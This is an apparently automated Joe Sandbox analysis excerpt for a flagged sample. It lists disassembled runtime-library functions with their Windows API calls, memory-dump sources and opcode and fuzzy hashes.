                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A441
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A44C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02150D90,?,?,?,00000000), ref: 02152657
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02150D90,?,?,?,00000000), ref: 0215265D
                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02150D90,?,?,?,00000000), ref: 0215268A
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02150D90,?,?,?,00000000), ref: 02152694
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02150D90,?,?,?,00000000), ref: 021526A6
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021526BC
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 021526CA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4227777306-0
                                                                                                                                                                                                                                • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                                • Instruction ID: be5d83b81a7e332cc0ec7613f64aeb73eb6c0d16f0ea646ec9b5d831349a24e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0301D43A580125EADB24BF61EC48BBF37A8AF42B52B500465FC25E3050DB74D9048AE8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
                                                                                                                                                                                                                                • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4227777306-0
                                                                                                                                                                                                                                • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                                • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021566FB), ref: 021524A6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021524B4
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021524C2
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021566FB), ref: 021524F0
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 021524F7
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,021566FB), ref: 02152512
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,021566FB), ref: 0215251E
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02152534
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02152542
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                • String ID: kernel32.dll
                                                                                                                                                                                                                                • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                • Instruction ID: 2b03188bf3c015c6e82bfae153abd13cb0eca0f1e9d1fe6e1598402c39dc0f8f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF0A477941320BFF6123B797D9995A3FACDD46A233200676FC21D2292EB75C5008AA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception@8Throw
                                                                                                                                                                                                                                • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 2005118841-859722693
                                                                                                                                                                                                                                • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 004311CD
                                                                                                                                                                                                                                • _free.LIBCMT ref: 004311E6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431218
                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431221
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043122D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4275183328-0
                                                                                                                                                                                                                                • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021725DC,00000001,00000001,?), ref: 021723E5
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021725DC,00000001,00000001,?,?,?,?), ref: 0217246B
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02172565
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 02172572
                                                                                                                                                                                                                                  • Part of subcall function 021738FE: RtlAllocateHeap.NTDLL(00000000,0214DACD,00000000), ref: 02173930
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0217257B
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 021725A0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                                                                • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                • Instruction ID: 34fd7cba82eeeb06b37caa6e84a002e207552a94d4ddc29ce52fce3845a23541
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7051D172A80216AFDB258F64CC64EFF77BAEB84754F154628FC19D6250EB34DC42CA90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                                                                                                • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                • Instruction ID: f99d26bc13d65b290ca6b42f8a80c7fef50eb14ddbef1c306991e6b55becfafe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91512A7A980205AFDF249F688C48FBE77AAAF4C334F144359F815E6191EB31D521CAA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02163041
                                                                                                                                                                                                                                  • Part of subcall function 02158AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02158AAD
                                                                                                                                                                                                                                • SafeSQueue.LIBCONCRT ref: 0216305A
                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 0216311A
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0216313B
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02163149
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3496964030-0
                                                                                                                                                                                                                                • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                                • Instruction ID: 6e578c264ebc8309474ef03120a6e36d6973088a85c80e452b3dc66f8dff90ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD31C231A406219FCB29EF65C848BBEB7B5FF44B10F1545A9DC2A8B251DB70E859CBC0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02168F67
                                                                                                                                                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02168F80
                                                                                                                                                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02168F87
                                                                                                                                                                                                                                • PMDtoOffset.LIBCMT ref: 02168FA6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1467055271-0
                                                                                                                                                                                                                                • Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                                • Instruction ID: 551497abacaeb43facd47255829e20d25a5b6b67e1b6456c9a3b93bb5a2d1524
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC213B72684204AFCF14DFA8DC4DE7E77BAEF44710B168159E915D3180DB31E928CA90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1687354797-0
                                                                                                                                                                                                                                • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                • Instruction ID: beb700fe9c02c5f0976ad934c0dbdb595f4557f4349e37df9aa5b0916939ce95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E219471D44208AFDF11EBF4D840BDD77FAAF09325F58401AE418B7580DF7499448E65
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,02169028,021669B9,021808F7,00000008,02180C5C,?,?,?,?,02163CA2,?,?,0045A064), ref: 0216903F
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0216904D
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02169066
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,02169028,021669B9,021808F7,00000008,02180C5C,?,?,?,?,02163CA2,?,?,0045A064), ref: 021690B8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                • Instruction ID: a630e6a8fd3557da60c8c2238b62d05752f1892d0ae6a2a0a64ca5a4b01224be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2101F7361897116FA7242BB46C8CA7F3B9DEB45775B30033DE920951F1EF2288315989
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,CD528FDE), ref: 00428DD8
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,CD528FDE), ref: 00428E51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02144FC0
                                                                                                                                                                                                                                • int.LIBCPMT ref: 02144FD7
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0214BFCA
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0214BFE4
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02144FE0
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 02145011
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02145027
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02145045
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                • Instruction ID: 58681298dcb56ca4134a72a47a9545dd5add3bf1f2d9d0f4f94c543ee046bf82
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C11E031980228AFCB25EBA4D810BAD73B2BF54715F500519E41DAB2D1CF34AA05CF90
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                                                                                                                                                                                • int.LIBCPMT ref: 00404D70
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0214C3F7
                                                                                                                                                                                                                                • int.LIBCPMT ref: 0214C40E
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0214BFCA
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0214BFE4
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0214C417
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0214C448
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0214C45E
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0214C47C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2243866535-0
                                                                                                                                                                                                                                • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                • Instruction ID: ad381ecd25c721e8dd3b6538f6c7f4afd889fe83ac235c7028f01fb0186a7b41
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8111CB729802289FCB14EBA0D850AFD77B6AF44724F54052AE819AB291DF349A05CFE0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02144E82
                                                                                                                                                                                                                                • int.LIBCPMT ref: 02144E99
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0214BFCA
                                                                                                                                                                                                                                  • Part of subcall function 0214BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0214BFE4
                                                                                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02144EA2
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 02144ED3
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02144EE9
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02144F07
